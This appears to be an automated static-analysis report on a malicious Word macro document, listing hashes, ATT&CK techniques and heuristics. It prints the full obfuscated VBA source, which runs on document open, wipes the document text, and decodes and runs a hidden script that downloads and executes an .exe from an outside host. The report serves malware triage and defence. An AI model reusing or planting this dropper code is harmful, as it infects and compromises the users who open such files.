Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 362d8a32c240bb5f…

MALICIOUS

Office (OLE)

Size: 58.5 KB
Created: 2016-08-31 00:29:00
Authoring application: Microsoft Office Word
First seen: 2016-10-06
MD5: ef0594680ac58c7e089b6e9464a1a79f
SHA-1: f80fa12bb09790d5c114696d10c299509ef3fda6
SHA-256: 362d8a32c240bb5f0973f5a2eb5465c509471c005cbf43d6fa4c82a08d4eb68e
Risk Score: 112

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers the execution of another subroutine that deletes the document's content and saves the file. This behavior, combined with the high-confidence heuristic for CreateObject and p-code auto-execution, suggests the macro is designed to prepare the system for a second-stage payload, likely downloaded from a remote source. The specific obfuscation in the VBA script prevents a confident identification of the exact payload delivery mechanism.

Heuristics (6)

  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Set QTPdboULFN = fljLcvnm(CreateObject(MGdAvjTm))
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
    Public Sub Document_Open()
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7515 bytes
SHA-256: 7d5ce1673fe2ce99deca3a9199dc0ed329db9249891b246da7d2aca9f6afd2a0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
78 of 125 identifiers look randomly generated (e.g. 'xbuqldbwfzrkcPnfutzTfmjG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim XFkTbjBuLbs
XFkTbjBuLbs = 69
If XFkTbjBuLbs < 84 Then
Dim yieek(0)
For Each mdVmmNps In yieek
mdVmmNps = mdVmmNps - 15
Next
End If
Select Case XFkTbjBuLbs
End Select
Módulo1.BkMMeGP
End Sub


Attribute VB_Name = "Módulo1"
Public Sub BkMMeGP()
ActiveDocument.Content.Select
Dim SpBZerZvOQVI
SpBZerZvOQVI = 51
If SpBZerZvOQVI < 32 Then
Dim oPbbnuc
oPbbnuc = 59
If oPbbnuc < 3 Then
oPbbnuc = oPbbnuc + 62
End If
End If
Selection.Delete
Dim tgONLoKE
tgONLoKE = ""
Dim ICLsOeqXF
ICLsOeqXF = 50
If ICLsOeqXF < 60 Then
Dim PbvfVvVDEE
PbvfVvVDEE = 93
Select Case PbvfVvVDEE
Case 44
Dim jtyXc(4)
jtyXc(0) = 69
jtyXc(1) = 27
jtyXc(2) = 7
jtyXc(3) = 45
Case 23
Dim caPfC(0)
For Each IRjelkNOkmL In caPfC
IRjelkNOkmL = IRjelkNOkmL - 48
Next
Case 20
PbvfVvVDEE = PbvfVvVDEE + 79
End Select
End If
Selection.TypeText (tgONLoKE)
ActiveDocument.Save
fbZyfV
Dim VfduZF(6)
VfduZF(0) = 18
VfduZF(1) = 40
VfduZF(2) = 20
VfduZF(3) = 2
VfduZF(4) = 21
VfduZF(5) = 35
End Sub
Private Sub fbZyfV()
Dim KmVTSHL(3)
KmVTSHL(0) = 53
KmVTSHL(1) = 16
KmVTSHL(2) = 15
For Each lpafK In KmVTSHL
lpafK = lpafK - 73
Next
Dim ZbmWr, BhctxUV, aNqmNlsTPD, fbLZwSY, ZWGskbh
ZbmWr = "gj~jh<wg*ao1!-wdFOZt)ovs/wNRFzrQrPS!<oRywQrCsUK!,!(!d0!fyf/end(!>!wdFOZt!sbw<*oRywQrCsUK)fmjGfufmfE/KRcsTZ!*ftmbg!>>!*oRywQrCsUK)tutjyFfmjG/KRcsTZ)gj<ftpmD/RT[tM<*oRywQrCsUK)fmjGpUfwbT/RT[tM<*oRywQr"
BhctxUV = "CsUK)fmjGfufmfE/KRcsTZ!**oRywQrCsUK)tutjyFfmjG/KRcsTZ)gj<*zepCftopqtfS/FEtGohtVnJ)fujsX/RT[tM!|!*113!>>!tvubuT/FEtGohtVnJ)!gj!<*)eoft/FEtGohtVnJ!<*1!-(fyf/7213tfubeqvbwbk0npd/topjtsfwfddjg1mmbthozuu"
Dim FebwDF(9)
FebwDF(0) = 10
FebwDF(1) = 11
FebwDF(2) = 86
FebwDF(3) = 28
FebwDF(4) = 27
FebwDF(5) = 63
FebwDF(6) = 17
FebwDF(7) = 66
FebwDF(8) = 34
aNqmNlsTPD = "fteobtsfwzse/xxx00;quui(!-(ufH()ofqp/FEtGohtVnJ!<*(2/6/utfvrfSquuIojX/quuIojX()udfkcPYfwjudB!xfo!>!FEtGohtVnJ!sbw!<1!>!opjujtpQ/RT[tM<2!>!fqzU/RT[tM<*)ofqP/RT[tM<*(nbfsuT/CEPEB()!udfkcPYfwjudB!xfo!>"
fbLZwSY = "!RT[tM!sbw<!(fyf/554qnubw5K(!,!(]](!,!*3!)sfempGmbjdfqTufH/KRcsTZ!>!oRywQrCsUK!sbw!<*(udfkcPnfutzTfmjG/hojuqjsdT()!udfkcPYfwjudB!xfo!>!KRcsTZ!sbw!<*(mmfiT/uqjsdTX()udfkcPYfwjudB!xfo!>!wNRFzrQrPS!sbw"
ZWGskbh = ZbmWr & BhctxUV
ZWGskbh = ZWGskbh & aNqmNlsTPD & fbLZwSY
Dim zRGeRJkzmbbLE(9)
zRGeRJkzmbbLE(0) = 78
zRGeRJkzmbbLE(1) = 86
zRGeRJkzmbbLE(2) = 53
zRGeRJkzmbbLE(3) = 66
zRGeRJkzmbbLE(4) = 66
zRGeRJkzmbbLE(5) = 6
zRGeRJkzmbbLE(6) = 15
zRGeRJkzmbbLE(7) = 56
zRGeRJkzmbbLE(8) = 83
Set WVpoy = QTPdboULFN(PbRcSVyaVe("xbuqldbwfzrkcPnfutzTfmjG/hojuqjsdT"))
Dim zRTOyTKF
zRTOyTKF = 96
If zRTOyTKF < 26 Then
zRTOyTKF = zRTOyTKF + 73
End If
Dim rGXOM
rGXOM = WVpoy.GetSpecialFolder(2) & PbRcSVyaVe("lptoikyv/gamjtPcrUTw]")
Dim ttLJoKlB(3)
ttLJoKlB(0) = 89
ttLJoKlB(1) = 34
ttLJoKlB(2) = 10
Set xNgKGS = WVpoy.CreateTextFile(rGXOM, True, True)
Dim MjZvLgwLK
MjZvLgwLK = 10
Select Case MjZvLgwLK
End Select
xNgKGS.Write PbRcSVyaVe(ZWGskbh)
xNgKGS.Close
Set oWBupifg = QTPdboULFN(PbRcSVyaVe("vbofepmrjgjubdjmqqB/mmfiT"))
hDnnJZCyh oWBupifg, rGXOM
ActiveDocument.Password = PbRcSVyaVe("zn[rgfyinztTEc")
ActiveDocument.Save
End Sub
Public Function QTPdboULFN(ByVal MGdAvjTm As String)
Dim iIHBbYX
iIHBbYX = 19
If iIHBbYX < 97 Then
Dim kSePhy(0)
End If
Set QTPdboULFN = fljLcvnm(CreateObject(MGdAvjTm))
Dim mNvca
mNvca = 56
If mNvca < 14 Then
Dim AeiQsQw
AeiQsQw = 5
If AeiQsQw < 70 Then
Dim JrCBwZTZ(8)
JrCBwZTZ(0) = 30
JrCBwZTZ(1) = 68
JrCBwZTZ(2) = 14
JrCBwZTZ(3) = 95
JrCBwZTZ(4) = 45
JrCBwZTZ(5) = 7
JrCBwZTZ(6) = 2
JrCBwZTZ(7) = 25
End If
Select Case AeiQsQw
Case 81
AeiQsQw = AeiQsQw + 50
Case 54
AeiQsQw = AeiQsQw + 88
End Select
End If
End Function
Public Function fljLcvnm(ByVal QTPdboULFN As Object)
Set fljLcvnm = QTPdboULFN
End Function
Public Sub hDnnJZCyh(ByVal uOYhGwu As Object, ByVal hOyojGfhi As String)
uOYhGwu.Open (hOyojGfhi)
End Sub
Private Function PbRcSVyaVe(stringToDeZWGskbh)
Dim aiHQxs(4)
aiHQxs(0) = 40
aiHQxs(1) = 54
aiHQxs(2) = 21
aiHQxs(3) = 11
stringToDeZWGskbh = Replace(stringToDeZWGskbh, "AInWrYMntt", "q")
Dim jwIqLPkPxUS
jwIqLPkPxUS = 4
Select Case jwIqLPkPxUS
Case 14
Dim klkqIn(4)
klkqIn(0) = 5
klkqIn(1) = 82
klkqIn(2) = 14
klkqIn(3) = 5
Case 53
jwIqLPkPxUS = jwIqLPkPxUS + 81
End Select
stringToDeZWGskbh = Replace(stringToDeZWGskbh, "aRckiyJ", "n")
Dim guHGJuSXE(7)
guHGJuSXE(0) = 95
guHGJuSXE(1) = 15
guHGJuSXE(2) = 25
guHGJuSXE(3) = 32
guHGJuSXE(4) = 16
guHGJuSXE(5) = 32
guHGJuSXE(6) = 94
For Each qFovnB In guHGJuSXE
qFovnB = qFovnB - 25
Next
stringToDeZWGskbh = Replace(stringToDeZWGskbh, "cGwcTZIwFCq", "z")
Dim mrrWDnfKG(4)
mrrWDnfKG(0) = 12
mrrWDnfKG(1) = 50
mrrWDnfKG(2) = 7
mrrWDnfKG(3) = 83
For Each eToRR In mrrWDnfKG
eToRR = eToRR - 50
Next
Dim BCBZLcVXN, vtshrFO
vtshrFO = Len(stringToDeZWGskbh)
Dim WyQXYshQfH
For WyQXYshQfH = 1 To vtshrFO
Dim HpjyWY
Dim JeTxWGI(3)
JeTxWGI(0) = 45
JeTxWGI(1) = 79
JeTxWGI(2) = 29
HpjyWY = Mid(stringToDeZWGskbh, WyQXYshQfH, 1)
If (WyQXYshQfH - 1) < 12 And (WyQXYshQfH) Mod 3 = 0 Then
HpjyWY = Chr(Asc(HpjyWY) - 1)
Dim TYwga(0)
BCBZLcVXN = BCBZLcVXN & HpjyWY
ElseIf (WyQXYshQfH - 1) >= 12 Then
Dim RpBzDtK(5)
RpBzDtK(0) = 78
RpBzDtK(1) = 23
RpBzDtK(2) = 62
RpBzDtK(3) = 60
RpBzDtK(4) = 98
HpjyWY = Chr(Asc(HpjyWY) - 1)
BCBZLcVXN = BCBZLcVXN & HpjyWY
End If
Next
Dim lOAQjGn
lOAQjGn = 65
Select Case lOAQjGn
End Select
Dim GRefVeVLFD
vtshrFO = Len(BCBZLcVXN)
Dim hcYaetAVAFG
hcYaetAVAFG = 83
If hcYaetAVAFG < 38 Then
Dim AOjNaRe(3)
AOjNaRe(0) = 67
AOjNaRe(1) = 24
AOjNaRe(2) = 49
End If
Select Case hcYaetAVAFG
Case 93
hcYaetAVAFG = hcYaetAVAFG + 41
Case 7
hcYaetAVAFG = hcYaetAVAFG + 99
Case 61
hcYaetAVAFG = hcYaetAVAFG + 36
Case 69
Dim ykAkXuPZeNd(8)
ykAkXuPZeNd(0) = 50
ykAkXuPZeNd(1) = 33
ykAkXuPZeNd(2) = 90
ykAkXuPZeNd(3) = 12
ykAkXuPZeNd(4) = 89
ykAkXuPZeNd(5) = 36
ykAkXuPZeNd(6) = 57
ykAkXuPZeNd(7) = 51
For Each EyrwVSm In ykAkXuPZeNd
EyrwVSm = EyrwVSm - 97
Next
End Select
For WyQXYshQfH = vtshrFO To 1 Step -1
GRefVeVLFD = GRefVeVLFD & Mid(BCBZLcVXN, WyQXYshQfH, 1)
Dim NZmKNdImv(4)
NZmKNdImv(0) = 85
NZmKNdImv(1) = 76
NZmKNdImv(2) = 69
NZmKNdImv(3) = 76
Next
PbRcSVyaVe = GRefVeVLFD
Dim nnLMczLpn
nnLMczLpn = 57
If nnLMczLpn < 38 Then
Dim wFdLMb
wFdLMb = 87
If wFdLMb < 77 Then
Dim oFMNSxKx
oFMNSxKx = 52
If oFMNSxKx < 80 Then
Dim bagNgg(1)
bagNgg(0) = 9
End If
Select Case oFMNSxKx
Case 35
Dim eUeBGN(8)
eUeBGN(0) = 69
eUeBGN(1) = 79
eUeBGN(2) = 70
eUeBGN(3) = 1
eUeBGN(4) = 40
eUeBGN(5) = 20
eUeBGN(6) = 52
eUeBGN(7) = 9
Case 26
Dim MYTIXKRN(8)
MYTIXKRN(0) = 22
MYTIXKRN(1) = 7
MYTIXKRN(2) = 86
MYTIXKRN(3) = 89
MYTIXKRN(4) = 78
MYTIXKRN(5) = 63
MYTIXKRN(6) = 75
MYTIXKRN(7) = 4
For Each QvglOwGyFFr In MYTIXKRN
QvglOwGyFFr = QvglOwGyFFr - 16
Next
Case 50
Dim KSgIgKYzN(5)
KSgIgKYzN(0) = 84
KSgIgKYzN(1) = 98
KSgIgKYzN(2) = 75
KSgIgKYzN(3) = 90
KSgIgKYzN(4) = 65
Case 88
Dim MNgHoQlR(0)
For Each YZKNOF In MNgHoQlR
YZKNOF = YZKNOF - 46
Next
Case 61
oFMNSxKx = oFMNSxKx + 49
Case 82
oFMNSxKx = oFMNSxKx + 33
End Select
End If
End If
End Function